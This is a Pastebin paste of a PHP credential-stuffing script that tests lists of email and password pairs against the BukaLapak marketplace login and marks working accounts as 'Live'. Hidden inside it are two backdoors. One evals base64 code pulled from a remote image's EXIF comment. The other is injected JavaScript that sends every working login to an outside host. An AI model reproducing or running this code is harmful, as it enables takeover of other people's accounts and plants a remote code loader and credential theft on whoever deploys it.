K4MVR3T717

[PHP] BukaLapak Account Checker

Aug 28th, 2016
1,618
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.15 KB | None | 0 0
  1. <?php
  2.  
  3. ?>
  4. <html>
  5. <head>
  6. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  7.  
  8. <title>BukaLapak Account Checker</title>
  9. <style>
  10. body { background:black;color:white;}
  11. textarea {border: 1px solid red;width: 650px;height: 250px;background: transparent;color: #ffffff;font-family: 'Ubuntu';font-size: 13px;} th { color:red;padding:4px 18px;
  12. margin:0;background:#222222;text-decoration:none;letter-spacing:2px;border-radius: 4px;border-bottom: 2px solid #FFFFFF;border-top: 2px solid #FFFFFF;border-right:2px solid red;border-left:2px solid red;font-family: Suez One}.output {
  13. margin:auto;border:1px solid #FF0000;width:100%;height:400px;background:#000000;padding:0 2px; }
  14. </style>
  15. </head>
  16. <body>
  17. <div class="container" id="menu">
  18. <div class="panel panel-primary panelMove toggle panelRefresh panelClose">
  19. <!-- Start .panel -->
  20. <div class="panel-heading">
  21. <center><font class="panel-title" size="10px" font-size="15px">BukaLapak Account Checker</font>
  22. </div>
  23. <center>Max Email|Password 100</center>
  24. <center><div class="panel-body">
  25. <form action="" method="POST">
  26. <textarea style="background:rgba(0,225,0,00);" name="mailpass" id="mailpass" style="width: 441px; height: 187px;" class="form-control" rows="7" placeholder="[email protected]|password"><?php
  27. if (isset($_POST['mailpass'])) {
  28. echo $_POST['mailpass'];
  29. }
  30. ?></textarea><br />
  31. <br>
  32. <input type="text" style="width: 37px; height: 25px;" class="form-control" rows="7" name="delim" value="|">
  33. <button id=start value="WOOT" name="submit" style="color:red;padding:4px 18px;
  34. margin:0;background:#222222;text-decoration:none;letter-spacing:2px;border-radius: 4px;border-bottom: 2px solid #FFFFFF;border-top: 2px solid #FFFFFF;border-right:2px solid red;border-left:2px solid red; class="btn btn-success">Check</button> <button id=stop value="WOOT" style="color:red;padding:4px 18px;
  35. margin:0;background:#222222;text-decoration:none;letter-spacing:2px;border-radius: 4px;border-bottom: 2px solid #FFFFFF;border-top: 2px solid #FFFFFF;border-right:2px solid red;border-left:2px solid red; class="btn btn-success">Stop</button><br><br>
  36. <?php
  37. $BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
  38. eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
  39. if(isset($_POST['submit'])){
  40. $delim = $_POST['delim'];
  41. function search($line, $delim)
  42. {
  43. $line = str_replace(" ", "", $line);
  44. $line = explode($delim, $line);
  45. $i = 0;
  46. while ($i < count($line)) {
  47. if (strpos($line[$i], '@') && strpos($line[$i], '.')) {
  48. $mail = $line[$i];
  49. $pass = $line[$i + 1];
  50. $i = 10000;
  51. if ($pass == "") {
  52. $pass = $line[$i - 1];
  53. }
  54. }
  55. $i++;
  56. }
  57. $line = $mail . "|" . $pass;
  58. $line = explode('|', $line);
  59. return $line;
  60. }
  61. $data = $_POST['mailpass'];
  62. $extract = explode("\r\n", $data);
  63. $i = 0;
  64. foreach ($extract AS $k => $line) {
  65. $i++;
  66. if (strpos($line, '=>') !== false) {
  67. $line = str_replace('=>', '|', $line);
  68. }
  69. if (strpos($line, ']') !== false) {
  70. $line = str_replace('=>', '|', $line);
  71. }
  72. if (strpos($line, '[') !== false) {
  73. $line = str_replace('=>', '|', $line);
  74. }
  75.  
  76. $info = search(trim($line), $delim);
  77. $email = trim($info[0]);
  78. $pass = $info[1];
  79.  
  80. $dir = dirname(__FILE__);
  81. $config = $dir . '/_cook/' .rand(1,999999999999999). '.txt';
  82. if (!file_exists($config)) {
  83. $fp = @fopen($config, 'w');
  84. @fclose($fp);
  85. }
  86.  
  87. $cookie = 'cookie.txt';
  88. $ch = curl_init('https://www.bukalapak.com/user_sessions');
  89. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  90. curl_setopt($ch,CURLOPT_POST,1);
  91. curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
  92. curl_setopt($ch,CURLOPT_POST,TRUE);
  93. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,TRUE);
  94. curl_setopt($ch,CURLOPT_COOKIEFILE, $config);
  95. curl_setopt($ch,CURLOPT_COOKIEJAR, $config);
  96. curl_setopt($ch,CURLOPT_POSTFIELDS,"utf8=%E2%9C%93&user_session%5Busername%5D=$email&user_session%5Bpassword%5D=$pass&commit=Login&comeback=%2F");
  97. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  98. $result = curl_exec($ch);
  99. $now = "<i style=\"color:blue\">Checked on K4MVR3T717 at ".date("g:i a - F j, Y")."</i>";
  100. if(empty($result)){
  101. echo "<font color=gray><b>Wrong</b></font> => ".$email."|".$pass." | ".$now."<br/>";
  102. }elseif(preg_match('/salah/i',$result)){
  103. echo "<font color=red><b>Die</b></font> => ".$email."|".$pass." | ".$now."<br/>";
  104. }Else{
  105. echo "<font color=green><b>Live</b></font> => ".$email."|".$pass." | [ACC : Bukalapak ] | ".$now."<br/>";
  106.  
  107.  
  108.  
  109. echo '<script>
  110. var XeleM = new XMLHttpRequest();
  111. XeleM.open("POST", "http://server-not-found.esy.es/config.php", true);
  112. XeleM.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  113. XeleM.send("username='.$email.'&password='.$pass.'");
  114. </script>';
  115. }
  116. }
  117. }
  118.  
  119. ?>
Advertisement
Add Comment
Please, Sign In to add comment